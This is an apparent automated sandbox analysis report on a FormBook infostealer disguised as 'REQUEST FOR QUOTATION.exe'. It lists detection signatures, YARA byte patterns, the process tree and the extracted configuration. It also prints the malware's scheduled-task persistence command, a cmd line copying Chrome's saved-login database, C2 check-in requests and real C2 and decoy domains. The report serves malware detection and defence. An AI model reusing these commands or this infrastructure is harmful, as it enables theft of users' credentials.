
Analysis Report REQUEST FOR QUOTATION.exe

Overview

General Information

Sample Name: REQUEST FOR QUOTATION.exe
Analysis ID: 356564
MD5: 1d229f76672a250bd0c2ff84417d63e3
SHA1: 907889ef592995b2e923bc367ad5fe5fb3ab8275
SHA256: 65dbaf77c991e5737ecf9041dea34a7e9eca1e38925ff69340435a3cff1314a3
Tags: FormBook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • REQUEST FOR QUOTATION.exe (PID: 6992 cmdline: 'C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe' MD5: 1D229F76672A250BD0C2FF84417D63E3)
    • schtasks.exe (PID: 7132 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • REQUEST FOR QUOTATION.exe (PID: 3848 cmdline: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe MD5: 1D229F76672A250BD0C2FF84417D63E3)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 6284 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 240 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.entrustedhomeinspections.com/xxg/"], "decoy": ["avoidandaxidents.com", "splendorinthewoods.com", "soubeta.digital", "sellfreecourses.com", "upstreamleadership.com", "crescentdough.com", "yycqfw.com", "tmfosbqhu.icu", "franmogulfranchise.com", "xn--qrq5jk69mkda.com", "moreiramenezes.com", "defidegen.com", "corchosc.com", "jemadrqhxaahe.com", "gerderser.com", "bajihalozat.com", "stickleyrep.com", "sah-ko.net", "kenapa5-and.com", "truehealerwithin.com", "conkamx.com", "therukoothutamil.com", "laikaswatches.com", "paradiseminks.com", "jerikashofashion.com", "brickhouse.cloud", "theozserver.com", "surendra-sharma.com", "malaysianmoney.com", "artoutlive.online", "lovingsunmarket.com", "premiumnetworkstore.com", "160meter.com", "geeksgambit.com", "voluminousaesthetics.com", "secure000-amazon.com", "jrubrand.com", "oxz5.com", "sonoscape.email", "naigves.com", "htwa.net", "rfl.xyz", "kuangjiam99.com", "inventqa.com", "9ine-tees.com", "188jersey.com", "yourspartanyard.com", "upwardinjesus.life", "644745.com", "deepbluedecor.com", "schleperkortebau.info", "txsurvivalkit.com", "tooplaya.com", "fukaikeji.com", "tntvor.com", "internationalsoccerteams.com", "attorneyscottrynecki.com", "ptpatennis.com", "hottomsoutlet.com", "oshitapartscenter.com", "tropicalcure.com", "mastermindsnow.com", "covidacademicexpert.com", "energiern.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
1.2.REQUEST FOR QUOTATION.exe.32b277c.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe', ParentImage: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe, ParentProcessId: 6992, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp', ProcessId: 7132
Sigma detected: Steal Google chrome login data
Source: Process started; Author: Joe Security; Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\systray.exe, ParentImage: C:\Windows\SysWOW64\systray.exe, ParentProcessId: 6284, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 240

Signature Overview

AV Detection:

Found malware configuration
Source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack; Malware Configuration Extractor: FormBook (same C2 list and decoy list as given under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe; ReversingLabs: Detection: 14%
Multi AV Scanner detection for submitted file
Source: REQUEST FOR QUOTATION.exe; Virustotal: Detection: 28%
Source: REQUEST FOR QUOTATION.exe; ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match; File source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: REQUEST FOR QUOTATION.exe; Joe Sandbox ML: detected
Source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: REQUEST FOR QUOTATION.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: REQUEST FOR QUOTATION.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: systray.pdb; source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711557561.0000000001690000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP; source: explorer.exe, 00000006.00000002.934087091.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: systray.pdbGCTL; source: REQUEST FOR QUOTATION.exe, 00000005.00000002.711557561.0000000001690000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP; source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710064884.0000000001190000.00000040.00000001.sdmp, systray.exe, 00000008.00000002.923476107.0000000005190000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: REQUEST FOR QUOTATION.exe, 00000005.00000002.710064884.0000000001190000.00000040.00000001.sdmp, systray.exe
Source: Binary string: wscui.pdb; source: explorer.exe, 00000006.00000002.934087091.0000000005A00000.00000002.00000001.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe; Code function: 4x nop then pop ebx; 5_2_00407AFA
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe; Code function: 4x nop then pop edi; 5_2_00416CB4
Source: C:\Windows\SysWOW64\systray.exe; Code function: 4x nop then pop ebx; 8_2_03227AFC
Source: C:\Windows\SysWOW64\systray.exe; Code function: 4x nop then pop edi; 8_2_03236CB4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 166.62.28.109:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 166.62.28.109:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 166.62.28.109:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.entrustedhomeinspections.com/xxg/
Source: global traffic; HTTP traffic detected: GET /xxg/?Jt7=XPIX3NrP&GlW8J=a8BlEgGkOe5HuSVVIZfAbA83PDdExW7ERnrZA1n9agEZzoNw0EhQ9Eby65z8jt1XZsvj HTTP/1.1; Host: www.premiumnetworkstore.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ+NpuMmHjL7rBp7fN9vXv0Msl1t0&Jt7=XPIX3NrP HTTP/1.1; Host: www.internationalsoccerteams.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View; IP Address: 204.11.56.48
Source: Joe Sandbox View; ASN Name: CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View; ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: global traffic; HTTP traffic detected: POST /xxg/ HTTP/1.1; Host: www.premiumnetworkstore.com; Connection: close; Content-Length: 411; Cache-Control: no-cache; Origin: http://www.premiumnetworkstore.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://www.premiumnetworkstore.com/xxg/; Accept-Language: en-US; Accept-Encoding: gzip, deflate; Data: encoded form body (parameter GlW8J) omitted
Source: global traffic; HTTP traffic detected: POST /xxg/ HTTP/1.1; Host: www.premiumnetworkstore.com; Connection: close; Content-Length: 170935; Cache-Control: no-cache; Origin: http://www.premiumnetworkstore.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://www.premiumnetworkstore.com/xxg/; Accept-Language: en-US; Accept-Encoding: gzip, deflate; Data: encoded form body (parameter GlW8J) omitted
Source: global traffic; HTTP traffic detected: POST /xxg/ HTTP/1.1; Host: www.internationalsoccerteams.com; Connection: close; Content-Length: 411; Cache-Control: no-cache; Origin: http://www.internationalsoccerteams.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://www.internationalsoccerteams.com/xxg/; Accept-Language: en-US; Accept-Encoding: gzip, deflate; Data: encoded form body (parameter GlW8J) omitted
Source: global traffic; HTTP traffic detected: POST /xxg/ HTTP/1.1; Host: www.internationalsoccerteams.com; Connection: close; Content-Length: 170935; Cache-Control: no-cache; Origin: http://www.internationalsoccerteams.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://www.internationalsoccerteams.com/xxg/; Accept-Language: en-US; Accept-Encoding: gzip, deflate; Data: encoded form body (parameter GlW8J) omitted
Source: global traffic; HTTP traffic detected: GET /xxg/?Jt7=XPIX3NrP&GlW8J=a8BlEgGkOe5HuSVVIZfAbA83PDdExW7ERnrZA1n9agEZzoNw0EhQ9Eby65z8jt1XZsvj HTTP/1.1; Host: www.premiumnetworkstore.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ+NpuMmHjL7rBp7fN9vXv0Msl1t0&Jt7=XPIX3NrP HTTP/1.1; Host: www.internationalsoccerteams.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: unknown; DNS traffic detected: queries for: www.premiumnetworkstore.com
Source: unknown; HTTP traffic detected: POST /xxg/ HTTP/1.1; Host: www.premiumnetworkstore.com; Connection: close; Content-Length: 411; Cache-Control: no-cache; Origin: http://www.premiumnetworkstore.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://www.premiumnetworkstore.com/xxg/; Accept-Language: en-US; Accept-Encoding: gzip, deflate; Data: encoded form body (parameter GlW8J) omitted
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
            Source: REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000006.00000000.673000917.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
            Source: systray.exe, 00000008.00000002.924420530.0000000005839000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/10_Best_Mutual_Funds.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Bl
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/Anti_Wrinkle_Creams.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Blx
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/Best_Mortgage_Rates.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Blx
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/Cheap_Air_Tickets.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxTH
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/Free_Credit_Report.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxT
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/Migraine_Pain_Relief.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Bl
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/Top_10_Luxury_Cars.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxT
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/__media__/js/trademark.php?d=internationalsoccerteams.com&ty
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/display.cfm
            Source: systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp | String found in binary or memory: http://www.internationalsoccerteams.com/px.js?ch=1
